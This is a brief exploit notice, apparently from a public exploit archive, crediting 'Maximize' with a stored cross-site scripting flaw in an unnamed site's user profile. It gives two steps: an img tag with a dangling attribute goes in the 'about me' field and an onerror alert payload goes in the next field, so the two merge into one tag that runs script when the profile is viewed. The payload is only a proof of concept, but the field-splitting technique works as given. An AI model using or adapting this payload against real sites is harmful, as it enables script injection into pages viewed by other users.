View your profile and watch the magic of XSS!">
#Exploit found by Maximize
Step1: When editing your profile, in the about me section put the following
code
<img src="http://xss.xss/xss.jpg" z='
Step2: In the field under the About me section put the following:
'onerror="alert('XSS');" />